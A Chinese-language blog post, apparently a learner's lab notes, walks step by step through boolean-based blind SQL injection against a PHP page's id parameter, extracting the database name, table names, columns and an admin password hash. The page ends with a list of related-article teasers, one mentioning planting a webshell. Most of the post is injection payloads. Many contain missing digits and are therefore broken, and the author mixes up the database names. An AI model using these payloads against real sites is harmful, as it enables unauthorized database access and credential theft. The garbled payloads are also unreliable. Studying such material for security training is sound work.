盲注 那么我们来了解一点盲注的语法

这里面是语法的介绍

https://blog.csdn.net/alex_seo/article/details/82148955

0X01第一步我们先判断当前数据库的长度

语法构造

/index.php?id=%20and%20length((select%20database()))%3E3 正确
index.php?id= and length((select database()))>4 错误

那我们确定数据库名字大于3不大于4 那么数据库长度就是4了

0X02爆数据库名称

http://www.php-sqli.net/index.php?id=1%20and%20ascii(substr((select%20database()),1,1))%3E1 正确
?id= and ascii(substr((select database()),,))>100 真确
id= and ascii(substr((select database()),,))>115正确




?id=1 and ascii(substr((select database()),1,1))>116 错误






那我们得到数据库的第一个位置的数据的ascii是116 =>t


继续爆第二个




?id= and ascii(substr((select database()),,))>100 正确






?id= and ascii(substr((select database()),,))>101 错误 




那么第二个字母是 101=>e


继续爆第三个




?id= and ascii(substr((select database()),,))>114 正确  

?id= and ascii(substr((select database()),,))>115 错误




第三个字母 115=> s


第四个




?id= and ascii(substr((select database()),,))> 真确  

?id= and ascii(substr((select database()),,))>116 错误




第四个 => 116 t


那么我们的数据库的名称应该是test


0X02爆表名


先判断有多少个表


1' and (select count(*) from information_schema.tables where table_schem=database())>5#


这里我不知道语法


然后第一个表的长度








id= and length((select table_name from information_schema.tables where table_schema='test' limit ,))>




这里可以看见正确




id=1 and length((select table_name from information_schema.tables where table_schema='test' limit 0,1))>5 错误




那么第一个表长度为4


爆第一个表的表名的第一个字母




?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>1 正确






?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>100 正确






?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>101 错误




那么这里我们知道表名的第一个之母是101=>e


第二个字母的爆破




?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>108 正确


?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109 错误




那么第二个字母 =>109  m


爆到这里不爆了 大概是email


我们开始爆破第二个表




?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>100 正确 
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114 错误
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113 正确




第一个字母是114=>r


不是admin不想要


第三个表




id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>116 正确
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),1,1))>117 错误




第一个字母 117=> u


这个人肯定是users表 不多bb了盲注太烦了直接爆 列名


卧槽 库名是test 我要写成security 打错特错


0X03爆列名


操作和爆破表名的操作是一样的


这里我们爆破出来是 username 和password


0X04爆字段


password




ascii(substr((select password from admin limit ,),,))>




查内容 我们在查我们的密码 在admin表里面的password列里面
												


											
大哥带我们的mysql注入 基于bool的盲注的更多相关文章
	

    
								
  1. 大哥带我们的mysql注入 基于时间的盲注
		
    ?id= and ,,sleep()) ?id= and ,,sleep()) if语句/if()函数 在基于时间型SQL盲注中,我们经常使用条件语句来判断我们的操作是否正确: ?id= and =  ...
    
		
    2. 
						
  2. 大哥带我们的mysql注入
		
    这是今天的任务 任务三个 : 第一个手工注入找出admin用户的密码,第二个读取我phpstudy中mysql的my.ini这个配置文件的内容,第三个是通过这个注入点写入一个webshell,  都是 ...
    
		
    3. 
						
  3. mysql order by基于时间的盲注
		
    order by后面的注入,一般先尝试报错注入,无报错的时候可以通过rand(ture)和rand(false)来进行bool型盲注,但是今天遇到完全没有数据回显的(也就是数据库中没有数据)情况,这就 ...
    
		
    4. 
						
  4. mysql基于“时间”的盲注
		
    无需页面报错,根据页面响应时间做判断! mysql基于时间的盲注 =================================================================== ...
    
		
    5. 
						
  5. 深入浅出带你玩转sqlilabs(五)-布尔/延时盲注与二次注入
		
    SQL测试-基于布尔,延时盲注 布尔,延时注入常用到的判断语句 regexp regexp '^xiaodi[a-z]' 匹配xiaodi及xiaodi...等 if if(条件,5,0) 条件成立  ...
    
		
    6. 
						
  6. SQL基于时间的盲注过程
		
    0x00 前言 由于要使用到基于时间的盲注,但是我觉得基于时间的盲注其实就是基于布尔的盲注的升级版,所以我想顺便把基于布尔的盲注分析总结了: 首先我觉得基于时间的盲注和基于布尔的盲注的最直观的差别就是 ...
    
		
    7. 
						
  7. DVWA-基于布尔值的盲注与基于时间的盲注学习笔记
		
    DVWA-基于布尔值的盲注与基于时间的盲注学习笔记 基于布尔值的盲注 一.DVWA分析 将DVWA的级别设置为low 1.分析源码,可以看到对参数没有做任何过滤,但对sql语句查询的返回的结果做了改变 ...
    
		
    8. 
						
  8. Python:SQLMap源码精读—基于时间的盲注(time-based blind)
		
    建议阅读 Time-Based Blind SQL Injection Attacks 基于时间的盲注(time-based blind) 测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以 ...
    
		
    9. 
						
  9. Python:SQLMap源码精读—基于错误的盲注(error-based blind)
		
    目标网址 http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1 Payload的生成 <test> <title>MyS ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Spring Boot解决无法访问图片的问题
			
    找了很多Spring Boot项目访问图片的解决方式,发现都是配置的,有时配置了也没有用.然后自己研究了一种简单操作的方法. 1,在Spring Boot的static目录下创建一个新目录img(或者 ...
    
			
    2. 
						
  2. C# 并行编程之早起三件事
			
    故事背景 透着纱的窗外的阳光, 又是一个星期一. 慢慢来 一看时间, 还早, 那么蹦跶起来 穿衣 刷牙 洗脸 用代码来说的话, 应该是这样: // Program.cs using System; u ...
    
			
    3. 
						
  3. The authenticity of host 'github.com (52.74.223.119)' can't be established.
			
    出现这种错误的问题应考虑是否配置ssh,若没有配置,则进行相关配置 若配置后还出现这种问题,这是由于本地缺少一个文化夹.直接yes而不是y或是回车
    
			
    4. 
						
  4. 十、LaTex数学公式初步
			
    
			
    5. 
						
  5. 53道Java线程面试题
			
    53道Java线程面试题 下面是Java线程相关的热门面试题,你可以用它来好好准备面试. 1) 什么是线程? 线程是操作系统能够进行运算调度的最小单位,它被包含在进程之中,是进程中的实际运作单位.程序 ...
    
			
    6. 
						
  6. AT&T推出云5G网络开源工具Airship
			
    导读 AT&T新推出的云5G网络依赖于一个名为“Airship”的开源供应工具,该工具在周一发布了第一个版本. AT&T负责网络云的副总裁Amy Wheelus告诉LightReadi ...
    
			
    7. 
						
  7. Ubuntu18.04 安装redis
			
    Redis是常用基于内存的Key-Value数据库,比Memcache更先进,支持多种数据结构,高效,快速.用Redis可以很轻松解决高并发的数据访问问题:作为实时监控信号处理也非常不错. 安装red ...
    
			
    8. 
						
  8. 第一节,搭建openwrt开发环境
			
    一,安装VMware虚拟机或者VirtualBox虚拟机 安装过程就不在此赘述了.附上百度搜索来的链接,供大家参考. https://baijiahao.baidu.com/s?id=16233731 ...
    
			
    9. 
						
  9. CentOS7安装并使用Ceph
			
    1.准备工作1.1 安装配置NTP官方建议在所有 Ceph 节点上安装 NTP 服务(特别是 Ceph Monitor 节点),以免因时钟漂移导致故障. ln -sf /usr/share/zonei ...
    
			
    10. 
						
  10. java8 新特性,stream的应用
			
    https://www.cnblogs.com/fengli9998/p/9002377.html http://www.runoob.com/java/java8-optional-class.ht ...
    
			
    11.